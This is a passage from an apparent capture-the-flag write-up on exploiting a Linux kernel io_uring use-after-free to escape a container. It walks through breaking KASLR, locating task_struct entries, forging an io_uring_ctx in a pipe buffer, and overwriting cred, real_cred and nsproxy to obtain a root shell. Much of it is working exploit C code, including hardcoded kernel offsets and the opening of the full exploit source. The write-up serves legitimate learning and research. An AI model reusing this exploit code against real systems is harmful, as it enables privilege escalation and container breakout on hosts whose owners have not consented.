<p>At this point, my goal is to find the host Init <code class="language-plaintext highlighter-rouge">task_struct</code> in memory and find the value of a few important members: <code class="language-plaintext highlighter-rouge">real_cred</code>, <code class="language-plaintext highlighter-rouge">cred</code>, and <code class="language-plaintext highlighter-rouge">nsproxy</code>. <code class="language-plaintext highlighter-rouge">real_cred</code> is used to track the user and group IDs that were originally responsible for creating the process and unlike <code class="language-plaintext highlighter-rouge">cred</code>, <code class="language-plaintext highlighter-rouge">real_cred</code> remains constant and does not change due to things like <code class="language-plaintext highlighter-rouge">setuid</code>. <code class="language-plaintext highlighter-rouge">cred</code> is used to convey the “effective” credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, <code class="language-plaintext highlighter-rouge">nsproxy</code> is a pointer to a struct that contains all of the information about our task’s namespaces like network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our <code class="language-plaintext highlighter-rouge">task_struct</code>. Luckily, the address of the <code class="language-plaintext highlighter-rouge">init</code> task is a constant offset from the kernel base, so once we broke KASLR with our read of the <code class="language-plaintext highlighter-rouge">error_entry</code> address, we can then copy those values with our arbitrary read capability since they would reside at known addresses (offsets from the <code class="language-plaintext highlighter-rouge">init</code> task symbol).</p>

<h3 id="forging-objects">Forging Objects</h3>
<p>With those values in hand, we now need to find our own <code class="language-plaintext highlighter-rouge">task_struct</code> in memory so that we can overwrite our members with those of <code class="language-plaintext highlighter-rouge">init</code>. To do this, I took advantage of the fact that the <code class="language-plaintext highlighter-rouge">task_struct</code> has a linked list of tasks on the system. So early in the exploit, I spawn a child process with a known name, this name fits within the <code class="language-plaintext highlighter-rouge">task_struct</code> <code class="language-plaintext highlighter-rouge">comm</code> field, and so as I traverse through the linked list of tasks on the system, I just simply check each task’s <code class="language-plaintext highlighter-rouge">comm</code> field for my easily identifiable child process. You can see how I do that in this code snippet:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">traverse_tasks</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>    
    <span class="c1">// Process name buf</span>
    <span class="kt">char</span> <span class="n">current_comm</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

    <span class="c1">// Get the next task after init</span>
    <span class="kt">uint64_t</span> <span class="n">current_next</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_init_task</span> <span class="o">+</span> <span class="n">TASKS_NEXT_OFF</span><span class="p">);</span>
    <span class="kt">uint64_t</span> <span class="n">current</span> <span class="o">=</span> <span class="n">current_next</span> <span class="o">-</span> <span class="n">TASKS_NEXT_OFF</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">task_valid</span><span class="p">(</span><span class="n">current</span><span class="p">))</span>
    <span class="p">{</span> 
        <span class="n">err</span><span class="p">(</span><span class="s">"Invalid task after init: 0x%lx"</span><span class="p">,</span> <span class="n">current</span><span class="p">);</span>    
    <span class="p">}</span>

    <span class="c1">// Read the comm</span>
    <span class="n">read_comm_at</span><span class="p">(</span><span class="n">current</span> <span class="o">+</span> <span class="n">COMM_OFF</span><span class="p">,</span> <span class="n">current_comm</span><span class="p">);</span>
    <span class="c1">//printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);</span>

    <span class="c1">// While we don't have NULL, traverse the list</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">task_valid</span><span class="p">(</span><span class="n">current</span><span class="p">))</span>
    <span class="p">{</span>
        <span class="n">current_next</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">current_next</span><span class="p">);</span>
        <span class="n">current</span> <span class="o">=</span> <span class="n">current_next</span> <span class="o">-</span> <span class="n">TASKS_NEXT_OFF</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">current</span> <span class="o">==</span> <span class="n">g_init_task</span><span class="p">)</span> <span class="p">{</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// Read the comm</span>
        <span class="n">read_comm_at</span><span class="p">(</span><span class="n">current</span> <span class="o">+</span> <span class="n">COMM_OFF</span><span class="p">,</span> <span class="n">current_comm</span><span class="p">);</span>
        <span class="c1">//printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);</span>

        <span class="c1">// If we find the target comm, save it</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">current_comm</span><span class="p">,</span> <span class="n">TARGET_TASK</span><span class="p">))</span>
        <span class="p">{</span>
            <span class="n">g_target_task</span> <span class="o">=</span> <span class="n">current</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="c1">// If we find our target comm, save it</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">current_comm</span><span class="p">,</span> <span class="n">OUR_TASK</span><span class="p">))</span>
        <span class="p">{</span>
            <span class="n">g_our_task</span> <span class="o">=</span> <span class="n">current</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember that we need to fake a few objects in memory, like the <code class="language-plaintext highlighter-rouge">io_uring_ctx</code> for instance. Usually this done by crafting objects in the kernel heap and somehow discoverying their address with a leak. In my case, I have a whole pipe buffer which is 4096 bytes of memory to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a <a href="https://elixir.bootlin.com/linux/v5.19/source/include/linux/fdtable.h#L49">file descriptor table</a> inside of its <code class="language-plaintext highlighter-rouge">files</code> member. After some time <code class="language-plaintext highlighter-rouge">printk</code> some offsets, I was able to traverse through my own task’s file descriptor table and learn the address of my pipe buffer. This is because the pipe buffer page is obviously page aligned so I can just page align the address we read from the file descriptor table as the address of our UAF file. So now I know exactly in memory where my pipe buffer is, and I also know what offset onto that page our UAF <code class="language-plaintext highlighter-rouge">struct file</code> resides. I have a small helper function to set a “scratch space” region address as a global and then use that memory to set up our fake <code class="language-plaintext highlighter-rouge">io_uring_ctx</code>. You can see those functions here, first finding our pipe buffer address:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">find_pipe_buf_addr</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Get the base of the files array</span>
    <span class="kt">uint64_t</span> <span class="n">files_ptr</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_file_array</span><span class="p">);</span>
    
    <span class="c1">// Adjust the files_ptr to point to our fd in the array</span>
    <span class="n">files_ptr</span> <span class="o">+=</span> <span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span> <span class="o">*</span> <span class="n">g_uaf_fd</span><span class="p">);</span>

    <span class="c1">// Get the address of our UAF file struct</span>
    <span class="kt">uint64_t</span> <span class="n">curr_file</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">files_ptr</span><span class="p">);</span>

    <span class="c1">// Calculate the offset</span>
    <span class="n">g_off</span> <span class="o">=</span> <span class="n">curr_file</span> <span class="o">&amp;</span> <span class="mh">0xFFF</span><span class="p">;</span>

    <span class="c1">// Set the globals</span>
    <span class="n">g_file_addr</span> <span class="o">=</span> <span class="n">curr_file</span><span class="p">;</span>
    <span class="n">g_pipe_buf</span> <span class="o">=</span> <span class="n">g_file_addr</span> <span class="o">-</span> <span class="n">g_off</span><span class="p">;</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>And then determining the location of our scratch space where we will forge the fake <code class="language-plaintext highlighter-rouge">io_uring_ctx</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Here, all we're doing is determing what side of the page the UAF file is on,</span>
<span class="c1">// if its on the front half of the page, the back half is our scratch space</span>
<span class="c1">// and vice versa</span>
<span class="kt">void</span> <span class="nf">set_scratch_space</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">g_scratch</span> <span class="o">=</span> <span class="n">g_pipe_buf</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">g_off</span> <span class="o">&lt;</span> <span class="mh">0x500</span><span class="p">)</span> <span class="p">{</span> <span class="n">g_scratch</span> <span class="o">+=</span> <span class="mh">0x500</span><span class="p">;</span> <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now we have one more read to do and this is really just to make the exploit easier. In order to avoid a lot of debugging while triggering my write, I need to make sure that my fake <code class="language-plaintext highlighter-rouge">io_uring_ctx</code> contains as many valid fields as necessary. If you start with a completely <code class="language-plaintext highlighter-rouge">NULL</code> object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what kind of value that member should have had. Instead, I chose to copy a legitimate instance of a real <code class="language-plaintext highlighter-rouge">io_uring_ctx</code> instead by reading and copying its contents to a global buffer. Working now from a good base, our forged object can then be set-up properly to perform our arbitrary write from, you can see me using the copy and updating the necessary fields here:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">write_setup_ctx</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">uint32_t</span> <span class="n">what</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">where</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Copy our copied real ring fd </span>
    <span class="n">memcpy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">g_off</span><span class="p">],</span> <span class="n">g_ring_copy</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>

    <span class="c1">// Set f-&gt;f_count to 1 </span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">count</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">g_off</span> <span class="o">+</span> <span class="mh">0x38</span><span class="p">];</span>
    <span class="o">*</span><span class="n">count</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Set f-&gt;private_data to our scratch space</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">private_data</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">g_off</span> <span class="o">+</span> <span class="mh">0xc8</span><span class="p">];</span>
    <span class="o">*</span><span class="n">private_data</span> <span class="o">=</span> <span class="n">g_scratch</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cqe_cached</span>
    <span class="kt">size_t</span> <span class="n">cqe_cached</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x240</span><span class="p">;</span>
    <span class="n">cqe_cached</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">cached_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cqe_cached</span><span class="p">];</span>
    <span class="o">*</span><span class="n">cached_ptr</span> <span class="o">=</span> <span class="n">NULL_MEM</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cqe_sentinel</span>
    <span class="kt">size_t</span> <span class="n">cqe_sentinel</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x248</span><span class="p">;</span>
    <span class="n">cqe_sentinel</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">sentinel_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cqe_sentinel</span><span class="p">];</span>

    <span class="c1">// We need ctx-&gt;cqe_cached &lt; ctx-&gt;cqe_sentinel</span>
    <span class="o">*</span><span class="n">sentinel_ptr</span> <span class="o">=</span> <span class="n">NULL_MEM</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;rings so that ctx-&gt;rings-&gt;cq.tail is written to. That is at </span>
    <span class="c1">// offset 0xc0 from cq base address</span>
    <span class="kt">size_t</span> <span class="n">rings</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">;</span>
    <span class="n">rings</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">rings_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">rings</span><span class="p">];</span>
    <span class="o">*</span><span class="n">rings_ptr</span> <span class="o">=</span> <span class="n">where</span> <span class="o">-</span> <span class="mh">0xc0</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cached_cq_tail which is our what</span>
    <span class="kt">size_t</span> <span class="n">cq_tail</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x250</span><span class="p">;</span>
    <span class="n">cq_tail</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint32_t</span> <span class="o">*</span><span class="n">cq_tail_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cq_tail</span><span class="p">];</span>
    <span class="o">*</span><span class="n">cq_tail_ptr</span> <span class="o">=</span> <span class="n">what</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cq_wait the list head to itself (so that it's "empty")</span>
    <span class="kt">size_t</span> <span class="n">real_cq_wait</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x268</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">cq_wait</span> <span class="o">=</span> <span class="p">(</span><span class="n">real_cq_wait</span> <span class="o">&amp;</span> <span class="mh">0xFFF</span><span class="p">);</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">cq_wait_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cq_wait</span><span class="p">];</span>
    <span class="o">*</span><span class="n">cq_wait_ptr</span> <span class="o">=</span> <span class="n">real_cq_wait</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="performing-our-writes">Performing Our Writes</h3>
<p>Now, it’s time to do our writes. Remember those three sequential writes we were going to use inside of <code class="language-plaintext highlighter-rouge">io_fill_cqe_aux</code>, but I said they wouldn’t work with the exploit plan? Well the reason was, those three writes were as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">cqe</span> <span class="o">=</span> <span class="n">io_get_cqe</span><span class="p">(</span><span class="n">ctx</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">likely</span><span class="p">(</span><span class="n">cqe</span><span class="p">))</span> <span class="p">{</span>
		<span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">cqe</span><span class="o">-&gt;</span><span class="n">user_data</span><span class="p">,</span> <span class="n">user_data</span><span class="p">);</span>
		<span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">cqe</span><span class="o">-&gt;</span><span class="n">res</span><span class="p">,</span> <span class="n">res</span><span class="p">);</span>
		<span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">cqe</span><span class="o">-&gt;</span><span class="n">flags</span><span class="p">,</span> <span class="n">cflags</span><span class="p">);</span>
</code></pre></div></div>

<p>They worked really well <em>until</em> I went to overwrite the target <code class="language-plaintext highlighter-rouge">nsproxy</code> member of our target child <code class="language-plaintext highlighter-rouge">task_struct</code>. One of those writes inevitably overwrote the members right next to <code class="language-plaintext highlighter-rouge">nsproxy</code>: <code class="language-plaintext highlighter-rouge">signal</code> and <code class="language-plaintext highlighter-rouge">sighand</code>. This caused big problems for me because as interrupts occurred, those members (pointers) would be deref’d and cause the kernel to panic since they were invalid values. So I opted to just the 4-byte write instead inside <code class="language-plaintext highlighter-rouge">io_commit_cqring</code>. The 4-byte write also caused problems in that at some points <code class="language-plaintext highlighter-rouge">current</code> has it’s creds checked and with what basically amounted to a torn 8-byte write, we would leave <code class="language-plaintext highlighter-rouge">current</code> cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.</p>

<p>Now we can just use those same steps to overwrite the three members <code class="language-plaintext highlighter-rouge">real_cred</code>, <code class="language-plaintext highlighter-rouge">cred</code>, and <code class="language-plaintext highlighter-rouge">nsproxy</code> and now our child has all of the same privileges and capabilities including visiblity into the host root file system that <code class="language-plaintext highlighter-rouge">init</code> does. This is perfect, but I still wasn’t able to get the flag!</p>

<p>I started to panic at this point that I had seriously done something wrong. The exploit if FULL of paranoid checks: I reread every overwritten value to make sure it’s correct for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered in Andy Nguyen’s blog post, he used his <code class="language-plaintext highlighter-rouge">root</code> privileges to explictly set his namespace values with calls to <code class="language-plaintext highlighter-rouge">setns</code>. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as <code class="language-plaintext highlighter-rouge">init</code>, I was able to give it the same namespaces of itself lol. I still haven’t followed through on this to determine how <code class="language-plaintext highlighter-rouge">setns</code> is implemented, but this could probably be done without explicit <code class="language-plaintext highlighter-rouge">setns</code> calls and only with our read and write tools:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Our child waits to be given super powers and then drops into shell</span>
<span class="kt">void</span> <span class="nf">child_exec</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Change our taskname </span>
    <span class="k">if</span> <span class="p">(</span><span class="n">prctl</span><span class="p">(</span><span class="n">PR_SET_NAME</span><span class="p">,</span> <span class="n">TARGET_TASK</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`prctl()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">)</span><span class="n">g_shmem</span> <span class="o">==</span> <span class="mh">0x1337</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">sleep</span><span class="p">(</span><span class="mi">3</span><span class="p">);</span>
            <span class="n">info</span><span class="p">(</span><span class="s">"Child dropping into root shell..."</span><span class="p">);</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">setns</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/proc/self/ns/mnt"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`setns()`"</span><span class="p">);</span> <span class="p">}</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">setns</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/proc/self/ns/pid"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`setns()`"</span><span class="p">);</span> <span class="p">}</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">setns</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/proc/self/ns/net"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`setns()`"</span><span class="p">);</span> <span class="p">}</span>
            <span class="kt">char</span> <span class="o">*</span><span class="n">args</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="s">"/bin/sh"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">};</span>
            <span class="n">execve</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">args</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="k">else</span> <span class="p">{</span> <span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span> <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>And finally I was able to drop into a <code class="language-plaintext highlighter-rouge">root</code> shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment was not. This ended up not being a big deal, I had some out of band confirmation/paranoia checks I had to leave out but fortunately the arbitrary read we used isn’t actually hooked in any way by SELinux unlike most of the other <code class="language-plaintext highlighter-rouge">fcntl</code> syscall flags. At that point remember, we don’t know enough information to fake any objects in memory so I’d be dead in the water if that read method was ruined by SELinux.</p>

<h2 id="conclusion">Conclusion</h2>
<p>This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can be fun to work on with friends as well, big thanks to everyone mentioned already and also <a href="https://twitter.com/chompie1337">@chompie1337</a> who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full, let me know if you have any trouble understanding any of it, thanks.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Compile</span>
<span class="c1">// gcc sploit.c -o sploit -l:liburing.a -static -Wall</span>

<span class="cp">#define _GNU_SOURCE
#include</span> <span class="cpf">&lt;sched.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;errno.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdarg.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/time.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/resource.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/msg.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/timerfd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/prctl.h&gt;</span><span class="cp">
</span>
<span class="cp">#include</span> <span class="cpf">"liburing.h"</span><span class="cp">
</span>
<span class="c1">// /sys/kernel/slab/filp/objs_per_slab</span>
<span class="cp">#define OBJS_PER_SLAB 16UL
</span><span class="c1">// /sys/kernel/slab/filp/cpu_partial</span>
<span class="cp">#define CPU_PARTIAL 52UL
</span><span class="c1">// Multiplier for cross-cache arithmetic</span>
<span class="cp">#define OVERFLOW_FACTOR 2UL
</span><span class="c1">// Largest number of objects we could allocate per Cross-cache step</span>
<span class="cp">#define CROSS_CACHE_MAX 8192UL
</span><span class="c1">// Fixed mapping in cpu_entry_area whose contents is NULL</span>
<span class="cp">#define NULL_MEM 0xfffffe0000002000UL
</span><span class="c1">// Reading side of pipe</span>
<span class="cp">#define PIPE_READ 0
</span><span class="c1">// Writing side of pipe</span>
<span class="cp">#define PIPE_WRITE 1
</span><span class="c1">// error_entry inside cpu_entry_area pointer</span>
<span class="cp">#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
</span><span class="c1">// Offset from `error_entry` pointer to kernel base</span>
<span class="cp">#define EE_OFF 0xe0124dUL
</span><span class="c1">// Kernel text signature</span>
<span class="cp">#define KERNEL_SIGNATURE 0x4801803f51258d48UL
</span><span class="c1">// Offset from kernel base to init_task</span>
<span class="cp">#define INIT_OFF 0x18149c0UL
</span><span class="c1">// Offset from task to task-&gt;comm</span>
<span class="cp">#define COMM_OFF 0x738UL
</span><span class="c1">// Offset from task to task-&gt;real_cred</span>
<span class="cp">#define REAL_CRED_OFF 0x720UL
</span><span class="c1">// Offset from task to task-&gt;cred</span>
<span class="cp">#define CRED_OFF 0x728UL
</span><span class="c1">// Offset from task to task-&gt;nsproxy</span>
<span class="cp">#define NSPROXY_OFF 0x780UL
</span><span class="c1">// Offset from task to task-&gt;files</span>
<span class="cp">#define FILES_OFF 0x770UL
</span><span class="c1">// Offset from task-&gt;files to &amp;task-&gt;files-&gt;fdt</span>
<span class="cp">#define FDT_OFF 0x20UL
</span><span class="c1">// Offset from &amp;task-&gt;files-&gt;fdt to &amp;task-&gt;files-&gt;fdt-&gt;fd</span>
<span class="cp">#define FD_ARRAY_OFF 0x8UL
</span><span class="c1">// Offset from task to task-&gt;tasks.next</span>
<span class="cp">#define TASKS_NEXT_OFF 0x458UL
</span><span class="c1">// Process name to give root creds to </span>
<span class="cp">#define TARGET_TASK "blegh2"
</span><span class="c1">// Our process name</span>
<span class="cp">#define OUR_TASK "blegh1"
</span><span class="c1">// Offset from kernel base to io_uring_fops</span>
<span class="cp">#define FOPS_OFF 0x1220200UL
</span>
<span class="c1">// Shared memory with child</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">g_shmem</span><span class="p">;</span>

<span class="c1">// Child pid</span>
<span class="n">pid_t</span> <span class="n">g_child</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

<span class="c1">// io_uring instance to use</span>
<span class="k">struct</span> <span class="n">io_uring</span> <span class="n">g_ring</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

<span class="c1">// UAF file handle</span>
<span class="kt">int</span> <span class="n">g_uaf_fd</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

<span class="c1">// Track pipes</span>
<span class="k">struct</span> <span class="n">fd_pair</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">fd</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">fd_pair</span> <span class="n">g_pipe</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

<span class="c1">// The offset on the page where our `file` is</span>
<span class="kt">size_t</span> <span class="n">g_off</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Our fake file that is a copy of a legit io_uring fd</span>
<span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">g_ring_copy</span><span class="p">[</span><span class="mi">256</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

<span class="c1">// Keep track of files added in Cross-cache steps</span>
<span class="kt">int</span> <span class="n">g_cc1_fds</span><span class="p">[</span><span class="n">CROSS_CACHE_MAX</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="kt">size_t</span> <span class="n">g_cc1_num</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">g_cc2_fds</span><span class="p">[</span><span class="n">CROSS_CACHE_MAX</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="kt">size_t</span> <span class="n">g_cc2_num</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">g_cc3_fds</span><span class="p">[</span><span class="n">CROSS_CACHE_MAX</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="kt">size_t</span> <span class="n">g_cc3_num</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Gadgets and offsets</span>
<span class="kt">uint64_t</span> <span class="n">g_kern_base</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_init_task</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_target_task</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_our_task</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_cred_what</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
